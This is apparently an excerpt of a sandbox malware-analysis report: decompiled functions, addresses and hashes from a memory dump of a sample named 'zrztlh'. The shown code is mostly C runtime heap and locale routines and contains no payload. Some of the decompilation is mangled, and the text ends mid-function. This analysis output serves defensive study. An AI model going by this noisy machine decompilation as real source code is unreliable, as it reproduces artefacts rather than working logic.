                • Opcode ID: 3d16178d0b8265b4f8bda2033346f29d8615322d0464278124cad3f09c46bcd5
                • Instruction ID: 231bcedde2b57cd31494c5ac39b0e1bad85740da11d08c555f9a73bf6c151548
                • Opcode Fuzzy Hash: 3d16178d0b8265b4f8bda2033346f29d8615322d0464278124cad3f09c46bcd5
                • Instruction Fuzzy Hash: 4AA0113000820CABCA002B83EC088883F2CEB002A0B0000A0FC0C000208B23A8A28A80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA4917 Relevance: 40.6, APIs: 27, Instructions: 67COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00EA4917(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				void* _t60;
				void* _t65;

				_t65 = __esi;
				asm("in eax, dx");
				asm("sbb al, 0x1");
				 *((intOrPtr*)(__ecx + 0x11234e3)) =  *((intOrPtr*)(__ecx + 0x11234e3)) + __eax;
				 *((intOrPtr*)(__ecx + 0x16c96f3)) =  *((intOrPtr*)(__ecx + 0x16c96f3)) + __eax;
				_t6 = _t65 + 0xf8; // 0x55c35d59
				E00EB2248( *_t6);
				_t7 = _t65 + 0xfc; // 0x5768ec8b
				E00EB2248( *_t7);
				_t8 = _t65 + 0x100; // 0xff000001
				E00EB2248( *_t8);
				_t9 = _t65 + 0x104; // 0x43e80875
				E00EB2248( *_t9);
				_t10 = _t65 + 0x108; // 0x59000003
				E00EB2248( *_t10);
				_t11 = _t65 + 0x10c; // 0x55c35d59
				E00EB2248( *_t11);
				_t12 = _t65 + 0x110; // 0x106aec8b
				E00EB2248( *_t12);
				_t13 = _t65 + 0x114; // 0xe80875ff
				E00EB2248( *_t13);
				_t14 = _t65 + 0x118; // 0x332
				E00EB2248( *_t14);
				_t15 = _t65 + 0x11c; // 0xc35d5959
				E00EB2248( *_t15);
				_t16 = _t65 + 0x120; // 0x6aec8b55
				E00EB2248( *_t16);
				_t17 = _t65 + 0x124; // 0x875ff08
				E00EB2248( *_t17);
				_t18 = _t65 + 0x128; // 0x321e8
				E00EB2248( *_t18);
				_t19 = _t65 + 0x12c; // 0x5d595900
				E00EB2248( *_t19);
				_t20 = _t65 + 0x130; // 0xec8b55c3
				E00EB2248( *_t20);
				_t21 = _t65 + 0x134; // 0x75ff016a
				E00EB2248( *_t21);
				_t22 = _t65 + 0x138; // 0x310e808
				E00EB2248( *_t22);
				_t23 = _t65 + 0x13c; // 0x59590000
				E00EB2248( *_t23);
				_t24 = _t65 + 0x140; // 0x8b55c35d
				E00EB2248( *_t24);
				_t25 = _t65 + 0x144; // 0x8068ec
				E00EB2248( *_t25);
				_t26 = _t65 + 0x148; // 0x75ff0000
				E00EB2248( *_t26);
				_t27 = _t65 + 0x14c; // 0x2fce808
				E00EB2248( *_t27);
				_t28 = _t65 + 0x150; // 0x59590000
				E00EB2248( *_t28);
				_t29 = _t65 + 0x154; // 0x8b55c35d
				E00EB2248( *_t29);
				_t30 = _t65 + 0x158; // 0xff006aec
				E00EB2248( *_t30);
				_t31 = _t65 + 0x15c; // 0x8ce80875
				E00EB2248( *_t31);
				_t32 = _t65 + 0x160; // 0x59fffffe
				_t60 = E00EB2248( *_t32);
				return _t60;
			}





                0x00ea4917
                0x00ea4917
                0x00ea4918
                0x00ea491a
                0x00ea4920
                0x00eb8df2
                0x00eb8df8
                0x00eb8dfd
                0x00eb8e03
                0x00eb8e08
                0x00eb8e0e
                0x00eb8e13
                0x00eb8e19
                0x00eb8e21
                0x00eb8e27
                0x00eb8e2c
                0x00eb8e32
                0x00eb8e37
                0x00eb8e3d
                0x00eb8e42
                0x00eb8e48
                0x00eb8e4d
                0x00eb8e53
                0x00eb8e58
                0x00eb8e5e
                0x00eb8e63
                0x00eb8e69
                0x00eb8e6e
                0x00eb8e74
                0x00eb8e79
                0x00eb8e7f
                0x00eb8e84
                0x00eb8e8a
                0x00eb8e8f
                0x00eb8e95
                0x00eb8e9a
                0x00eb8ea0
                0x00eb8ea5
                0x00eb8eab
                0x00eb8eb0
                0x00eb8eb6
                0x00eb8ebb
                0x00eb8ec1
                0x00eb8ec6
                0x00eb8ecc
                0x00eb8ed4
                0x00eb8eda
                0x00eb8edf
                0x00eb8ee5
                0x00eb8eea
                0x00eb8ef0
                0x00eb8ef5
                0x00eb8efb
                0x00eb8f00
                0x00eb8f06
                0x00eb8f0b
                0x00eb8f11
                0x00eb8f16
                0x00eb8f1c
                0x00eb8f26

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 034a6473bbb3b2f040111bce762662fb3b0b83b001bc7e0b41a8a63d6e83d995
                • Instruction ID: c76c982d28fe3763c6dea60a184c129c29c08e1021c71fff5aab45d07e48d500
                • Opcode Fuzzy Hash: 034a6473bbb3b2f040111bce762662fb3b0b83b001bc7e0b41a8a63d6e83d995
                • Instruction Fuzzy Hash: 50211F71860601DBCB523B30DD036D77BE1AF25305F145E6DF3FEB41729A223965A642
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB842D Relevance: 19.6, APIs: 13, Instructions: 87COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E00EB842D(intOrPtr _a4) {
				intOrPtr _t15;
				intOrPtr _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t54 = _a4;
				if(_t54 != 0) {
					_t2 = _t54 + 0xc; // 0xf000000
					_t56 =  *_t2 -  *0xecee34; // 0xed0054
					if(_t56 != 0) {
						E00EB2248(_t16);
					}
					_t3 = _t54 + 0x10; // 0x254804b7
					_t57 =  *_t3 -  *0xecee38; // 0xed0054
					if(_t57 != 0) {
						E00EB2248(_t17);
					}
					_t4 = _t54 + 0x14; // 0x8000
					_t58 =  *_t4 -  *0xecee3c; // 0xed0054
					if(_t58 != 0) {
						E00EB2248(_t18);
					}
					_t5 = _t54 + 0x18; // 0xfc7d80
					_t59 =  *_t5 -  *0xecee40; // 0xed0054
					if(_t59 != 0) {
						E00EB2248(_t19);
					}
					_t6 = _t54 + 0x1c; // 0x4d8b0774
					_t60 =  *_t6 -  *0xecee44; // 0xed0054
					if(_t60 != 0) {
						E00EB2248(_t20);
					}
					_t7 = _t54 + 0x20; // 0x706183f8
					_t61 =  *_t7 -  *0xecee48; // 0xed0054
					if(_t61 != 0) {
						E00EB2248(_t21);
					}
					_t8 = _t54 + 0x24; // 0x5de58bfd
					_t62 =  *_t8 -  *0xecee4c; // 0xed0054
					if(_t62 != 0) {
						E00EB2248(_t22);
					}
					_t9 = _t54 + 0x38; // 0x5d595900
					_t63 =  *_t9 -  *0xecee60; // 0xed0058
					if(_t63 != 0) {
						E00EB2248(_t23);
					}
					_t10 = _t54 + 0x3c; // 0xec8b55c3
					_t64 =  *_t10 -  *0xecee64; // 0xed0058
					if(_t64 != 0) {
						E00EB2248(_t24);
					}
					_t11 = _t54 + 0x40; // 0x10368
					_t65 =  *_t11 -  *0xecee68; // 0xed0058
					if(_t65 != 0) {
						E00EB2248(_t25);
					}
					_t12 = _t54 + 0x44; // 0x875ff00
					_t66 =  *_t12 -  *0xecee6c; // 0xed0058
					if(_t66 != 0) {
						E00EB2248(_t26);
					}
					_t13 = _t54 + 0x48; // 0x401e8
					_t67 =  *_t13 -  *0xecee70; // 0xed0058
					if(_t67 != 0) {
						E00EB2248(_t27);
					}
					_t14 = _t54 + 0x4c; // 0x5d595900
					_t15 =  *_t14;
					_t68 = _t15 -  *0xecee74; // 0xed0058
					if(_t68 != 0) {
						return E00EB2248(_t15);
					}
				}
				return _t15;
			}


















                0x00eb8431
                0x00eb8436
                0x00eb843c
                0x00eb843f
                0x00eb8445
                0x00eb8448
                0x00eb844d
                0x00eb844e
                0x00eb8451
                0x00eb8457
                0x00eb845a
                0x00eb845f
                0x00eb8460
                0x00eb8463
                0x00eb8469
                0x00eb846c
                0x00eb8471
                0x00eb8472
                0x00eb8475
                0x00eb847b
                0x00eb847e
                0x00eb8483
                0x00eb8484
                0x00eb8487
                0x00eb848d
                0x00eb8490
                0x00eb8495
                0x00eb8496
                0x00eb8499
                0x00eb849f
                0x00eb84a2
                0x00eb84a7
                0x00eb84a8
                0x00eb84ab
                0x00eb84b1
                0x00eb84b4
                0x00eb84b9
                0x00eb84ba
                0x00eb84bd
                0x00eb84c3
                0x00eb84c6
                0x00eb84cb
                0x00eb84cc
                0x00eb84cf
                0x00eb84d5
                0x00eb84d8
                0x00eb84dd
                0x00eb84de
                0x00eb84e1
                0x00eb84e7
                0x00eb84ea
                0x00eb84ef
                0x00eb84f0
                0x00eb84f3
                0x00eb84f9
                0x00eb84fc
                0x00eb8501
                0x00eb8502
                0x00eb8505
                0x00eb850b
                0x00eb850e
                0x00eb8513
                0x00eb8514
                0x00eb8514
                0x00eb8517
                0x00eb851d
                0x00000000
                0x00eb8525
                0x00eb851d
                0x00eb8528

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: f5bf2d46b85f0bab3dd989ce622e6063782c6cadf7c115a5c54b7d68588bb4f1
                • Instruction ID: d86f6136d34f35263c62f8e6885103ebc235d3aae55e4d4c0ecb822de8d8c90d
                • Opcode Fuzzy Hash: f5bf2d46b85f0bab3dd989ce622e6063782c6cadf7c115a5c54b7d68588bb4f1
                • Instruction Fuzzy Hash: 35214B32940204AFC224EB69EA82C9B33EDAF003543A46D18F255F7771CE35FC848A25
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB7973 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 77%
                			E00EB7973(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t15;
				intOrPtr _t22;
				intOrPtr* _t42;

				if(_a4 > 5 || _a8 == 0) {
					L4:
					return 0;
				} else {
					_t42 = E00EB2280(8, 1);
					if(_t42 != 0) {
						_t12 = E00EB2280(0xb8, 1);
						 *_t42 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_t13 = E00EB2280(0x220, 1);
							 *((intOrPtr*)(_t42 + 4)) = _t13;
							__eflags = _t13;
							if(_t13 != 0) {
								E00EB7488( *_t42, 0xece800);
								_t15 = E00EB7D73(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
								_push( *((intOrPtr*)(_t42 + 4)));
								__eflags = _t15;
								if(__eflags == 0) {
									L14:
									E00EB2248();
									E00EB4248( *_t42);
									E00EB40EE( *_t42);
									E00EB2248(_t42);
									_t42 = 0;
									L16:
									return _t42;
								}
								_push( *((intOrPtr*)( *_t42 + 4)));
								_t22 = E00EB48E9(__edx, 1, __eflags);
								__eflags = _t22;
								if(_t22 == 0) {
									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
									goto L16;
								}
								_push( *((intOrPtr*)(_t42 + 4)));
								goto L14;
							}
							E00EB2248( *_t42);
							E00EB2248(_t42);
							L8:
							goto L3;
						}
						E00EB2248(_t42);
						goto L8;
					}
					L3:
					 *((intOrPtr*)(E00EAF100())) = 0xc;
					goto L4;
				}
			}











                0x00eb797c
                0x00eb79a2
                0x00000000
                0x00eb7984
                0x00eb798f
                0x00eb7995
                0x00eb79ae
                0x00eb79b3
                0x00eb79b7
                0x00eb79b9
                0x00eb79ca
                0x00eb79cf
                0x00eb79d4
                0x00eb79d6
                0x00eb79ef
                0x00eb79fc
                0x00eb7a04
                0x00eb7a07
                0x00eb7a09
                0x00eb7a1e
                0x00eb7a1e
                0x00eb7a25
                0x00eb7a2c
                0x00eb7a32
                0x00eb7a3a
                0x00eb7a43
                0x00000000
                0x00eb7a43
                0x00eb7a0d
                0x00eb7a10
                0x00eb7a17
                0x00eb7a19
                0x00eb7a41
                0x00000000
                0x00eb7a41
                0x00eb7a1b
                0x00000000
                0x00eb7a1b
                0x00eb79da
                0x00eb79e0
                0x00eb79c1
                0x00000000
                0x00eb79c1
                0x00eb79bc
                0x00000000
                0x00eb79bc
                0x00eb7997
                0x00eb799c
                0x00000000
                0x00eb799c

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                • String ID:
                • API String ID: 1503006713-0
                • Opcode ID: 0022b19fb101386713e5596c7b34828b6358e67d5e0f62417ca998e91ecbffc4
                • Instruction ID: 82d4e0dbc25873a375edb683a063a90e7f3d2b736cacafff5ce311300eef1a2b
                • Opcode Fuzzy Hash: 0022b19fb101386713e5596c7b34828b6358e67d5e0f62417ca998e91ecbffc4
                • Instruction Fuzzy Hash: 7321F63554D601EAEB263F64DC02EDB7BD4DFC1750B21642DF6C4B58B2EA3199009691
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA5135 Relevance: 18.1, APIs: 12, Instructions: 87COMMON
                Download Yara Rule
                C-Code - Quality: 70%
                			E00EA5135(void* __eax, void* __ebx) {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t8;
				void* _t13;
				void* _t23;
				void* _t24;
				void* _t26;
				intOrPtr* _t27;
				signed int _t28;
				signed int _t29;
				intOrPtr _t42;

				_t13 = __ebx;
				asm("adc eax, 0xec70fc");
				asm("int3");
				__imp__DecodePointer( *0xed0110, _t23, _t26);
				_t27 =  *0xecf20c; // 0x8fe940
				_t24 = __eax;
				if(_t27 != 0) {
					while( *_t27 != 0) {
						E00EB2248( *_t27);
						_t27 = _t27 + 4;
						if(_t27 != 0) {
							continue;
						}
						break;
					}
					_t27 =  *0xecf20c; // 0x8fe940
				}
				_push(_t13);
				E00EB2248(_t27);
				_t28 =  *0xecf208; // 0x0
				 *0xecf20c = 0;
				if(_t28 != 0) {
					while( *_t28 != 0) {
						E00EB2248( *_t28);
						_t28 = _t28 + 4;
						if(_t28 != 0) {
							continue;
						}
						break;
					}
					_t28 =  *0xecf208; // 0x0
				}
				E00EB2248(_t28);
				 *0xecf208 = 0;
				E00EB2248( *0xecf204);
				_t5 = E00EB2248( *0xecf200);
				_t29 = _t28 | 0xffffffff;
				 *0xecf204 = 0;
				 *0xecf200 = 0;
				if(_t24 != _t29) {
					_t42 =  *0xed0110; // 0xa744706c
					if(_t42 != 0) {
						_t5 = E00EB2248(_t24);
					}
				}
				__imp__EncodePointer(_t29);
				 *0xed0110 = _t5;
				_t6 =  *0xecfd10; // 0x0
				if(_t6 != 0) {
					E00EB2248(_t6);
					 *0xecfd10 = 0;
				}
				_t7 =  *0xecfd14; // 0x0
				if(_t7 != 0) {
					E00EB2248(_t7);
					 *0xecfd14 = 0;
				}
				_t8 =  *0xececec; // 0x910660
				asm("lock xadd [eax], esi");
				if(_t29 == 1) {
					_t8 =  *0xececec; // 0x910660
					if(_t8 != 0xeceac8) {
						_t8 = E00EB2248(_t8);
						 *0xececec = 0xeceac8;
					}
				}
				return _t8;
			}















                0x00ea5135
                0x00eb090d
                0x00eb0912
                0x00eb091b
                0x00eb0921
                0x00eb0927
                0x00eb092b
                0x00eb092d
                0x00eb0934
                0x00eb093a
                0x00eb093d
                0x00000000
                0x00000000
                0x00000000
                0x00eb093d
                0x00eb093f
                0x00eb093f
                0x00eb0945
                0x00eb0947
                0x00eb094c
                0x00eb0954
                0x00eb095d
                0x00eb095f
                0x00eb0965
                0x00eb096b
                0x00eb096e
                0x00000000
                0x00000000
                0x00000000
                0x00eb096e
                0x00eb0970
                0x00eb0970
                0x00eb0977
                0x00eb0982
                0x00eb0988
                0x00eb0993
                0x00eb0998
                0x00eb099b
                0x00eb09a4
                0x00eb09ac
                0x00eb09ae
                0x00eb09b4
                0x00eb09b7
                0x00eb09bc
                0x00eb09b4
                0x00eb09be
                0x00eb09c4
                0x00eb09c9
                0x00eb09d0
                0x00eb09d3
                0x00eb09d9
                0x00eb09d9
                0x00eb09df
                0x00eb09e6
                0x00eb09e9
                0x00eb09ef
                0x00eb09ef
                0x00eb09f5
                0x00eb09fa
                0x00eb0a00
                0x00eb0a02
                0x00eb0a0e
                0x00eb0a11
                0x00eb0a17
                0x00eb0a17
                0x00eb0a0e
                0x00eb0a1f

                APIs
                • DecodePointer.KERNEL32 ref: 00EB091B
                • _free.LIBCMT ref: 00EB0934
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB0947
                • _free.LIBCMT ref: 00EB0965
                • _free.LIBCMT ref: 00EB0977
                • _free.LIBCMT ref: 00EB0988
                • _free.LIBCMT ref: 00EB0993
                • _free.LIBCMT ref: 00EB09B7
                • EncodePointer.KERNEL32(00000000), ref: 00EB09BE
                • _free.LIBCMT ref: 00EB09D3
                • _free.LIBCMT ref: 00EB09E9
                • _free.LIBCMT ref: 00EB0A11
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                • String ID:
                • API String ID: 3064303923-0
                • Opcode ID: 5c34df1f3cd55801a7f99261e5b6b2fbb0ab5ab580c82bd8519dd1f20f667e7c
                • Instruction ID: 40097ca679f4d53ba173fe52876249510fa17ec11c5482e72e5d38763d3a9635
                • Opcode Fuzzy Hash: 5c34df1f3cd55801a7f99261e5b6b2fbb0ab5ab580c82bd8519dd1f20f667e7c
                • Instruction Fuzzy Hash: C0218F76D012118FD7259F16BC41E8B77A5FB817203141A3EFA34B3271CB366C468B81
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EB7A4A Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 80%
                			E00EB7A4A(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t43;
				signed int _t45;
				signed int _t60;
				void* _t68;
				void* _t71;
				intOrPtr _t77;
				void* _t79;
				intOrPtr* _t81;
				signed int _t82;
				signed int _t85;
				intOrPtr _t87;
				void* _t91;

				_t79 = __edx;
				_push(__ebx);
				_push(__esi);
				_t85 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t81 =  &_a12;
					while(1) {
						_t81 = _t81 + 4;
						_t38 = E00EB56BB(_a4, _a8,  *_t81);
						_t91 = _t91 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t85 = _t85 + 1;
						if(_t85 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00EAEB49(0, _t79);
					asm("int3");
					_push(0x14);
					_push(0xecc560);
					E00EAF1E0(0, _t81, _t85);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(_a4 <= 5) {
						_t87 = E00EB0595();
						_v36 = _t87;
						E00EB42E8(0, _t79, _t81, _t87, __eflags);
						 *(_t87 + 0x70) =  *(_t87 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t43 = E00EB2280(0xb8, 1);
						_pop(_t68);
						_t82 = _t43;
						_v40 = _t82;
						__eflags = _t82;
						if(_t82 != 0) {
							E00EB20A9(_t68, 0xc);
							_v8 = 1;
							E00EB7488(_t82,  *((intOrPtr*)(_t87 + 0x6c)));
							_pop(_t71);
							_v8 = _v8 & 0x00000000;
							E00EB7BBF();
							_t66 = E00EB7D73(0, _t79, _t82, _t87, _t82, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E00EB4248(_t82);
								_t43 = E00EB40EE(_t82);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00EBDB28(_a8, 0xece694);
									_pop(_t71);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0xed0050 = 1;
									}
								}
								E00EB20A9(_t71, 0xc);
								_v8 = 2;
								_t25 = _t87 + 0x6c; // 0x6c
								E00EB4368(_t25, _t82);
								E00EB4248(_t82);
								__eflags =  *(_t87 + 0x70) & 0x00000002;
								if(( *(_t87 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0xecee10 & 0x00000001;
									if(( *0xecee10 & 0x00000001) == 0) {
										E00EB4368(0xece7fc,  *((intOrPtr*)(_t87 + 0x6c)));
										_t77 =  *0xece7fc; // 0xece800
										_t32 = _t77 + 0x84; // 0xecee28
										 *0xecee20 =  *_t32;
										_t33 = _t77 + 0x90; // 0xec8760
										 *0xecee7c =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0xece690 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00EB7BCE();
							}
						}
						_v8 = 0xfffffffe;
						E00EB7C01(_t43, _t87);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00EAF100())) = 0x16;
						E00EAEB1E();
						_t45 = 0;
					}
					return E00EAF225(_t45);
				}
				L20:
			}




















                0x00eb7a4a
                0x00eb7a4d
                0x00eb7a50
                0x00eb7a51
                0x00eb7a56
                0x00eb7a7a
                0x00eb7a7d
                0x00eb7a58
                0x00eb7a58
                0x00eb7a59
                0x00eb7a5c
                0x00eb7a5c
                0x00eb7a67
                0x00eb7a6c
                0x00eb7a71
                0x00000000
                0x00000000
                0x00eb7a73
                0x00eb7a77
                0x00000000
                0x00eb7a79
                0x00000000
                0x00eb7a79
                0x00000000
                0x00eb7a77
                0x00eb7a7e
                0x00eb7a7f
                0x00eb7a80
                0x00eb7a81
                0x00eb7a82
                0x00eb7a83
                0x00eb7a88
                0x00eb7a89
                0x00eb7a8b
                0x00eb7a90
                0x00eb7a95
                0x00eb7a97
                0x00eb7a9a
                0x00eb7a9e
                0x00eb7abc
                0x00eb7abe
                0x00eb7ac1
                0x00eb7ac6
                0x00eb7aca
                0x00eb7ad4
                0x00eb7ada
                0x00eb7adb
                0x00eb7add
                0x00eb7ae0
                0x00eb7ae2
                0x00eb7aea
                0x00eb7af0
                0x00eb7afb
                0x00eb7b01
                0x00eb7b02
                0x00eb7b06
                0x00eb7b1a
                0x00eb7b1c
                0x00eb7b1f
                0x00eb7b21
                0x00eb7bda
                0x00eb7be0
                0x00eb7b27
                0x00eb7b27
                0x00eb7b2b
                0x00eb7b35
                0x00eb7b3b
                0x00eb7b3c
                0x00eb7b3e
                0x00eb7b40
                0x00eb7b40
                0x00eb7b3e
                0x00eb7b4c
                0x00eb7b52
                0x00eb7b59
                0x00eb7b5e
                0x00eb7b64
                0x00eb7b6c
                0x00eb7b70
                0x00eb7b72
                0x00eb7b79
                0x00eb7b83
                0x00eb7b8a
                0x00eb7b90
                0x00eb7b96
                0x00eb7b9b
                0x00eb7ba1
                0x00eb7ba6
                0x00eb7ba9
                0x00eb7ba9
                0x00eb7b79
                0x00eb7bae
                0x00eb7bb2
                0x00eb7bb2
                0x00eb7b21
                0x00eb7be7
                0x00eb7bee
                0x00eb7bf3
                0x00eb7aa0
                0x00eb7aa5
                0x00eb7aab
                0x00eb7ab0
                0x00eb7ab0
                0x00eb7bfa
                0x00eb7bfa
                0x00000000

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock
                • String ID:
                • API String ID: 3761839796-0
                • Opcode ID: 0556587309c4ec78ddf18c2651d575d65343c675548cc90777be7f85768d9d39
                • Instruction ID: 97ed45ac5066e8c087459026b5ba92eba88f7f01439dfcbd38624b984c597cf8
                • Opcode Fuzzy Hash: 0556587309c4ec78ddf18c2651d575d65343c675548cc90777be7f85768d9d39
                • Instruction Fuzzy Hash: CD412772508309AFCB10AFA4EC82BDF77E5EF88314F10652DF944BA692DB729541CB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA289A Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124COMMON
                Download Yara Rule
                C-Code - Quality: 97%
                			E00EA289A(signed int __ebx, signed int __ecx, intOrPtr __edx, signed int __esi) {
				signed char _t250;
				void* _t252;
				signed char _t254;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				intOrPtr _t260;
				void* _t261;
				void* _t262;
				signed int _t263;
				signed int _t265;
				long _t266;
				intOrPtr _t268;
				signed char _t272;
				signed char _t273;
				signed int _t274;
				signed int _t275;
				signed char _t276;
				signed int _t284;
				intOrPtr _t285;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				signed int _t294;
				void* _t295;
				signed int _t299;
				intOrPtr _t301;
				void* _t303;
				signed char _t304;
				long _t305;
				signed char _t306;
				signed int _t307;
				signed int _t309;
				signed int _t320;
				char _t321;
				char _t322;
				signed int _t324;
				void* _t325;
				signed char _t326;
				signed int _t334;
				intOrPtr _t335;
				void* _t337;
				void* _t338;
				void* _t339;
				signed int _t341;
				long _t342;
				void* _t343;
				long _t345;
				void _t353;
				void _t356;
				signed int _t362;
				signed int _t364;
				intOrPtr _t365;
				signed int _t366;
				void* _t367;
				intOrPtr _t369;
				signed int _t370;
				signed int _t375;
				long _t376;
				void* _t377;
				intOrPtr _t378;
				char _t381;
				signed int _t383;
				void* _t384;
				intOrPtr _t385;
				signed int _t387;
				void* _t390;
				intOrPtr _t391;
				intOrPtr _t394;
				char _t395;
				intOrPtr _t396;
				intOrPtr _t397;
				signed int _t398;
				void* _t399;
				void* _t400;
				void* _t401;
				signed int _t403;
				void _t405;
				void* _t406;
				void* _t407;
				signed int _t409;
				signed short* _t412;
				signed int _t413;
				void* _t416;
				char* _t418;
				long _t419;
				signed int _t423;
				intOrPtr _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed char* _t428;
				int _t429;
				signed int _t430;
				void* _t432;
				void* _t434;

				_t421 = __esi;
				_t396 = __edx;
				_t366 = __ecx;
				_t362 = __ebx;
				_t250 =  *((intOrPtr*)(__edx + __ebx + 0x24)) +  *((intOrPtr*)(__edx + __ebx + 0x24)) >> 1;
				 *(_t432 + 0x13) = _t250;
				_t252 = _t250 - 1;
				if(_t252 == 0) {
